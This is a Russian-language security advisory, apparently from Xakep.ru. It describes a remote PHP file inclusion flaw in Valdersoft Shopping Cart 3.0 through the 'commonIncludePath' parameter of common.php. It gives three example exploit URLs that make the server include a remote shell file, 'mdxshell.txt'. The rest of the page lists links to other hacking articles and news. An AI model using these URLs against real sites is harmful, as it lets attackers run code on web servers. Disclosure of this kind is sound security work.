PHP-инклюдинг в Valdersoft Shopping Cart

Рекомендуем почитать:

Xakep #288. Неправильные эльфы

Программа: Valdersoft Shopping Cart 3.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "commonIncludePath" сценарием common.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Примеры:

http://www.site.***/[path]/admin/include/common.php?commonIncludePath=http://mdxshell.txt?
http://www.site.***/[path]/include/common.php?commonIncludePath=http://mdxshell.txt?
http://www.site.***/[path]/common_include/common.php?commonIncludePath=http://mdxshell.txt?

PHP-инклюдинг в Valdersoft Shopping Cart

Xakep #288. Неправильные эльфы

Последние взломы

HTB Bagel. Захватываем сервер через десериализацию JSON в .NET

Киберфон. Превращаем телефон на Android в инструмент хакера

HTB Absolute. Атакуем Active Directory с повышением привилегий через KrbRelay

Фундаментальные основы хакерства. Осваиваем разные способы поиска защит в программах для x86-64

Компьютерные трюки

VPN для друзей. Разворачиваем свой VPN-сервер с оплатой через Telegram

Запретный апгрейд. Взламываем UEFI ноутбука Lenovo, чтобы поменять адаптер Wi-Fi

Мастерская хакера. ИИ-помощники, работа с JSON и приятные мелочи, которые пригодятся в работе

Крококряк. Снимаем трафик с витой пары обычными «крокодилами»

Свежие новости

МВД и FACCT ликвидировали мошенническую группу Jewelry Team

Серверные процессоры AMD EPYC 7002 зависают после 1044 дней работы

0-day уязвимость в MOVEit Transfer используется для хищения данных

Утилита triangle_check ищет атаки на iOS, связанные с «Операцией Триангуляция»

Эксперты: в открытом доступе опубликована БД сайта «Ренессанс Страхования»